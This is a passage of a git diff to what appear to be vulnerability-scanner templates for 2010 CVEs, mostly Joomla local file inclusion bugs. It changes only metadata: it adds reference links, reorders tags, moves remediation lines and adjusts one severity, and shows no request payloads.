cve-id: CVE-2010-1718
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml
index 52bc7b9493..0cc0b497f2 100644
--- a/cves/2010/CVE-2010-1719.yaml
+++ b/cves/2010/CVE-2010-1719.yaml
@@ -8,9 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/12233
- https://www.cvedetails.com/cve/CVE-2010-1719
+ - http://www.exploit-db.com/exploits/12233
classification:
cve-id: CVE-2010-1719
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1722.yaml b/cves/2010/CVE-2010-1722.yaml
index 31324d2d5d..f155d6b950 100644
--- a/cves/2010/CVE-2010-1722.yaml
+++ b/cves/2010/CVE-2010-1722.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
+ - http://web.archive.org/web/20140723201810/http://secunia.com/advisories/39409/
+ - http://www.exploit-db.com/exploits/12177
classification:
cve-id: CVE-2010-1722
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml
index f504d1d508..75b3e0903c 100644
--- a/cves/2010/CVE-2010-1723.yaml
+++ b/cves/2010/CVE-2010-1723.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12289
- https://www.cvedetails.com/cve/CVE-2010-1723
+ - http://web.archive.org/web/20140805101847/http://secunia.com/advisories/39524/
+ - http://www.exploit-db.com/exploits/12289
classification:
cve-id: CVE-2010-1723
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1858.yaml b/cves/2010/CVE-2010-1858.yaml
index 3a91c1523b..9e87647ddb 100644
--- a/cves/2010/CVE-2010-1858.yaml
+++ b/cves/2010/CVE-2010-1858.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11853
- https://www.cvedetails.com/cve/CVE-2010-1858
+ - http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/
+ - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1858
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1870.yaml b/cves/2010/CVE-2010-1870.yaml
index cbb0c289a7..d9cb416a40 100644
--- a/cves/2010/CVE-2010-1870.yaml
+++ b/cves/2010/CVE-2010-1870.yaml
@@ -8,12 +8,14 @@ info:
reference:
- https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
+ - https://www.exploit-db.com/exploits/14360
+ - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N
- cvss-score: 5.0
+ cvss-score: 5
cve-id: CVE-2010-1870
cwe-id: CWE-917
- tags: cve,cve2010,rce,listserv,ognl
+ tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1875.yaml b/cves/2010/CVE-2010-1875.yaml
index 3d1892a1ac..c3585c1038 100644
--- a/cves/2010/CVE-2010-1875.yaml
+++ b/cves/2010/CVE-2010-1875.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/11851
- https://www.cvedetails.com/cve/CVE-2010-1875
+ - http://web.archive.org/web/20140802140355/http://secunia.com/advisories/39074/
+ - http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/
classification:
cve-id: CVE-2010-1875
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1878.yaml b/cves/2010/CVE-2010-1878.yaml
index 7f22a2f09b..2204b99fec 100644
--- a/cves/2010/CVE-2010-1878.yaml
+++ b/cves/2010/CVE-2010-1878.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12317
- https://www.cvedetails.com/cve/CVE-2010-1878
+ - http://web.archive.org/web/20210121195712/https://www.securityfocus.com/bid/39606/
+ - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt
classification:
cve-id: CVE-2010-1878
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml
index 46514a4fd0..0e3c8d8590 100644
--- a/cves/2010/CVE-2010-1952.yaml
+++ b/cves/2010/CVE-2010-1952.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12239
- https://www.cvedetails.com/cve/CVE-2010-1952
+ - http://web.archive.org/web/20151016194238/http://secunia.com/advisories/39475/
+ - http://www.exploit-db.com/exploits/12239
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1952
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1953.yaml b/cves/2010/CVE-2010-1953.yaml
index 0c4f1002ce..33803c361e 100644
--- a/cves/2010/CVE-2010-1953.yaml
+++ b/cves/2010/CVE-2010-1953.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12288
- https://www.cvedetails.com/cve/CVE-2010-1953
+ - http://www.vupen.com/english/advisories/2010/0927
+ - http://www.exploit-db.com/exploits/12288
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1953
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml
index f328fbf262..563749ac73 100644
--- a/cves/2010/CVE-2010-1954.yaml
+++ b/cves/2010/CVE-2010-1954.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12287
- https://www.cvedetails.com/cve/CVE-2010-1954
+ - http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/
+ - http://www.exploit-db.com/exploits/12287
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1954
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1955.yaml b/cves/2010/CVE-2010-1955.yaml
index d514f8de8b..5a64f68bc5 100644
--- a/cves/2010/CVE-2010-1955.yaml
+++ b/cves/2010/CVE-2010-1955.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12238
- https://www.cvedetails.com/cve/CVE-2010-1955
+ - http://web.archive.org/web/20210121195552/https://www.securityfocus.com/bid/39508/
+ - http://web.archive.org/web/20140803091440/http://secunia.com/advisories/39473/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1955
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml
index db5fd91493..40d609582a 100644
--- a/cves/2010/CVE-2010-1956.yaml
+++ b/cves/2010/CVE-2010-1956.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12285
- https://www.cvedetails.com/cve/CVE-2010-1956
+ - http://web.archive.org/web/20140805105431/http://secunia.com/advisories/39522/
+ - http://www.exploit-db.com/exploits/12285
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1956
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: joomla,lfi,edb,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1957.yaml b/cves/2010/CVE-2010-1957.yaml
index 8e03d5dd90..98363e98d2 100644
--- a/cves/2010/CVE-2010-1957.yaml
+++ b/cves/2010/CVE-2010-1957.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12235
- https://www.cvedetails.com/cve/CVE-2010-1957
+ - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1957
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1977.yaml b/cves/2010/CVE-2010-1977.yaml
index b78f48fbd2..62d676323f 100644
--- a/cves/2010/CVE-2010-1977.yaml
+++ b/cves/2010/CVE-2010-1977.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12083
- https://www.cvedetails.com/cve/CVE-2010-1977
+ - http://web.archive.org/web/20210121195306/https://www.securityfocus.com/bid/39243/
+ - http://web.archive.org/web/20140724201603/http://secunia.com/advisories/39356/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1977
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1979.yaml b/cves/2010/CVE-2010-1979.yaml
index caa75776ef..7f083ff294 100644
--- a/cves/2010/CVE-2010-1979.yaml
+++ b/cves/2010/CVE-2010-1979.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12088
- https://www.cvedetails.com/cve/CVE-2010-1979
+ - http://web.archive.org/web/20140724185517/http://secunia.com/advisories/39360/
+ - http://www.exploit-db.com/exploits/12088
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1979
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1980.yaml b/cves/2010/CVE-2010-1980.yaml
index cdf77adef5..9d7f73a0c4 100644
--- a/cves/2010/CVE-2010-1980.yaml
+++ b/cves/2010/CVE-2010-1980.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12085
- https://www.cvedetails.com/cve/CVE-2010-1980
+ - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt
+ - http://www.exploit-db.com/exploits/12085
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1980
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1981.yaml b/cves/2010/CVE-2010-1981.yaml
index 86d7dd3d54..9b0586ed87 100644
--- a/cves/2010/CVE-2010-1981.yaml
+++ b/cves/2010/CVE-2010-1981.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12087
- https://www.cvedetails.com/cve/CVE-2010-1981
+ - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt
+ - http://www.exploit-db.com/exploits/12087
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1981
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1982.yaml b/cves/2010/CVE-2010-1982.yaml
index b78ef5a1d8..a11af27071 100644
--- a/cves/2010/CVE-2010-1982.yaml
+++ b/cves/2010/CVE-2010-1982.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12121
- https://www.cvedetails.com/cve/CVE-2010-1982
+ - http://web.archive.org/web/20140723233933/http://secunia.com/advisories/39202/
+ - http://web.archive.org/web/20210121195400/https://www.securityfocus.com/bid/39343/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1982
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1983.yaml b/cves/2010/CVE-2010-1983.yaml
index 82d4e0764b..3ce379a6df 100644
--- a/cves/2010/CVE-2010-1983.yaml
+++ b/cves/2010/CVE-2010-1983.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12055
- https://www.cvedetails.com/cve/CVE-2010-1983
+ - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt
+ - http://www.exploit-db.com/exploits/12055
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1983
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: joomla,lfi,edb,packetstorm,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2033.yaml b/cves/2010/CVE-2010-2033.yaml
index 082fc18a36..c961bef8ea 100644
--- a/cves/2010/CVE-2010-2033.yaml
+++ b/cves/2010/CVE-2010-2033.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
- https://www.cvedetails.com/cve/CVE-2010-2033
+ - http://web.archive.org/web/20140805143014/http://secunia.com/advisories/39873/
+ - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2033
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: packetstorm,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2034.yaml b/cves/2010/CVE-2010-2034.yaml
index 07d6b9831a..04f804fda0 100644
--- a/cves/2010/CVE-2010-2034.yaml
+++ b/cves/2010/CVE-2010-2034.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/34003
- https://www.cvedetails.com/cve/CVE-2010-2034
+ - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt
+ - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2034
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: edb,packetstorm,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2035.yaml b/cves/2010/CVE-2010-2035.yaml
index 2d1998e086..091206bed2 100644
--- a/cves/2010/CVE-2010-2035.yaml
+++ b/cves/2010/CVE-2010-2035.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/34006
- https://www.cvedetails.com/cve/CVE-2010-2035
+ - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+ - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2035
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: packetstorm,cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2036.yaml b/cves/2010/CVE-2010-2036.yaml
index 6bf06fc8e0..108e86df89 100644
--- a/cves/2010/CVE-2010-2036.yaml
+++ b/cves/2010/CVE-2010-2036.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/34004
- https://www.cvedetails.com/cve/CVE-2010-2036
+ - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt
+ - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2036
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,lfi,joomla
+ tags: cve2010,lfi,joomla,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml
index 737569005f..25f2e3df11 100644
--- a/cves/2010/CVE-2010-2037.yaml
+++ b/cves/2010/CVE-2010-2037.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/34005
- https://www.cvedetails.com/cve/CVE-2010-2037
+ - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
+ - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2037
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,lfi,joomla
+ tags: joomla,edb,packetstorm,cve,cve2010,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2045.yaml b/cves/2010/CVE-2010-2045.yaml
index 48e702ef20..6d407ff966 100644
--- a/cves/2010/CVE-2010-2045.yaml
+++ b/cves/2010/CVE-2010-2045.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12595
- https://www.cvedetails.com/cve/CVE-2010-2045
+ - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2045
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2050.yaml b/cves/2010/CVE-2010-2050.yaml
index eef5f84f42..ae40b3ac41 100644
--- a/cves/2010/CVE-2010-2050.yaml
+++ b/cves/2010/CVE-2010-2050.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12611
- https://www.cvedetails.com/cve/CVE-2010-2050
+ - http://web.archive.org/web/20210121200643/https://www.securityfocus.com/bid/40185/
+ - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2050
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml
index ed2f24987f..9ac39bcc09 100644
--- a/cves/2010/CVE-2010-2122.yaml
+++ b/cves/2010/CVE-2010-2122.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12623
- https://www.cvedetails.com/cve/CVE-2010-2122
+ - https://www.exploit-db.com/exploits/12618
+ - http://web.archive.org/web/20210624180854/https://www.securityfocus.com/bid/40192
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2122
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2128.yaml b/cves/2010/CVE-2010-2128.yaml
index 0c0221972a..70510e8ed0 100644
--- a/cves/2010/CVE-2010-2128.yaml
+++ b/cves/2010/CVE-2010-2128.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12607
- https://www.cvedetails.com/cve/CVE-2010-2128
+ - http://web.archive.org/web/20140801195113/http://secunia.com/advisories/39832/
+ - http://www.exploit-db.com/exploits/12607
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2128
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2259.yaml b/cves/2010/CVE-2010-2259.yaml
index 8938e35b5d..97477fcdd8 100644
--- a/cves/2010/CVE-2010-2259.yaml
+++ b/cves/2010/CVE-2010-2259.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/10946
- https://www.cvedetails.com/cve/CVE-2010-2259
+ - http://web.archive.org/web/20140724121430/http://secunia.com/advisories/37866/
+ - http://www.exploit-db.com/exploits/10946
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2259
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml
index 201f2aea94..566b2b3892 100644
--- a/cves/2010/CVE-2010-2307.yaml
+++ b/cves/2010/CVE-2010-2307.yaml
@@ -6,12 +6,14 @@ info:
severity: high
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
reference:
- - https://www.securityfocus.com/bid/40550/info
+ - http://web.archive.org/web/20210120195654/https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
+ - https://www.exploit-db.com/exploits/12865
+ - http://www.exploit-db.com/exploits/12865
+ remediation: Upgrade to a supported product version.
classification:
cve-id: CVE-2010-2307
- remediation: Upgrade to a supported product version.
- tags: cve,cve2010,iot,lfi,motorola
+ tags: cve2010,iot,lfi,motorola,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2507.yaml b/cves/2010/CVE-2010-2507.yaml
index c72a70e19b..9295c9f8a8 100644
--- a/cves/2010/CVE-2010-2507.yaml
+++ b/cves/2010/CVE-2010-2507.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/13981
- https://www.cvedetails.com/cve/CVE-2010-2507
+ - http://web.archive.org/web/20140805070317/http://secunia.com/advisories/40297/
+ - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2507
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: edb,packetstorm,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2680.yaml b/cves/2010/CVE-2010-2680.yaml
index e68dd0d628..efd570ebde 100644
--- a/cves/2010/CVE-2010-2680.yaml
+++ b/cves/2010/CVE-2010-2680.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/14064
- https://www.cvedetails.com/cve/CVE-2010-2680
+ - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt
+ - http://web.archive.org/web/20210121201853/https://www.securityfocus.com/bid/41163/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2680
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2682.yaml b/cves/2010/CVE-2010-2682.yaml
index 3b7ca7a83b..220e7b6f0b 100644
--- a/cves/2010/CVE-2010-2682.yaml
+++ b/cves/2010/CVE-2010-2682.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682
+ - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt
+ - http://www.exploit-db.com/exploits/14017
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2682
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2857.yaml b/cves/2010/CVE-2010-2857.yaml
index d4ceca8e82..8a3d4029c1 100644
--- a/cves/2010/CVE-2010-2857.yaml
+++ b/cves/2010/CVE-2010-2857.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/14274
- https://www.cvedetails.com/cve/CVE-2010-2857
+ - http://web.archive.org/web/20210121202225/https://www.securityfocus.com/bid/41485/
+ - http://www.exploit-db.com/exploits/14274
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2857
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2861.yaml b/cves/2010/CVE-2010-2861.yaml
index 3c01af7405..d7353ba7f1 100644
--- a/cves/2010/CVE-2010-2861.yaml
+++ b/cves/2010/CVE-2010-2861.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
- http://www.adobe.com/support/security/bulletins/apsb10-18.html
+ - http://securityreason.com/securityalert/8148
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2861
- remediation: Upgrade to a supported version.
metadata:
shodan-query: http.component:"Adobe ColdFusion"
- tags: cve,cve2010,coldfusion,lfi,adobe
+ tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2918.yaml b/cves/2010/CVE-2010-2918.yaml
index caefc416bd..4f7592f7c1 100644
--- a/cves/2010/CVE-2010-2918.yaml
+++ b/cves/2010/CVE-2010-2918.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/31708
- https://www.cvedetails.com/cve/CVE-2010-2918
+ - http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/
+ - https://www.exploit-db.com/exploits/14476
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2918
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: joomla,lfi,edb,cve,cve2010
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-2920.yaml b/cves/2010/CVE-2010-2920.yaml
index 9ba43cab77..6b9e2f8d92 100644
--- a/cves/2010/CVE-2010-2920.yaml
+++ b/cves/2010/CVE-2010-2920.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/12120
- https://www.cvedetails.com/cve/CVE-2010-2920
+ - http://www.vupen.com/english/advisories/2010/1844
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2920
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-3203.yaml b/cves/2010/CVE-2010-3203.yaml
index 8ab1009b02..4f52723a40 100644
--- a/cves/2010/CVE-2010-3203.yaml
+++ b/cves/2010/CVE-2010-3203.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/14845
- https://www.cvedetails.com/cve/CVE-2010-3203
+ - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/
+ - http://www.exploit-db.com/exploits/14845
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-3203
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-3426.yaml b/cves/2010/CVE-2010-3426.yaml
index be412616bf..ca28b72246 100644
--- a/cves/2010/CVE-2010-3426.yaml
+++ b/cves/2010/CVE-2010-3426.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/14964
- https://www.cvedetails.com/cve/CVE-2010-3426
+ - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt
+ - http://www.exploit-db.com/exploits/14964
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-3426
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: lfi,edb,packetstorm,cve,cve2010,joomla
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml
index d2b145bf0f..440d329e90 100644
--- a/cves/2010/CVE-2010-4231.yaml
+++ b/cves/2010/CVE-2010-4231.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
+ - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
+ - http://www.exploit-db.com/exploits/15505/
+ remediation: Upgrade to a supported product version.
classification:
cve-id: CVE-2010-4231
- remediation: Upgrade to a supported product version.
- tags: cve,cve2010,iot,lfi,camera
+ tags: cve,cve2010,iot,lfi,camera,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-4239.yaml b/cves/2010/CVE-2010-4239.yaml
index 6f3303143c..c2b4d8c476 100644
--- a/cves/2010/CVE-2010-4239.yaml
+++ b/cves/2010/CVE-2010-4239.yaml
@@ -3,14 +3,16 @@ id: CVE-2010-4239
info:
name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion
author: 0x_akoko
- severity: high
- description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion
+ severity: critical
+ description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.
reference:
- https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt
- - https://www.cvedetails.com/cve/CVE-2010-4239
+ - https://www.openwall.com/lists/oss-security/2010/11/22/9
+ - https://security-tracker.debian.org/tracker/CVE-2010-4239
+ - https://nvd.nist.gov/vuln/detail/CVE-2010-4239
classification:
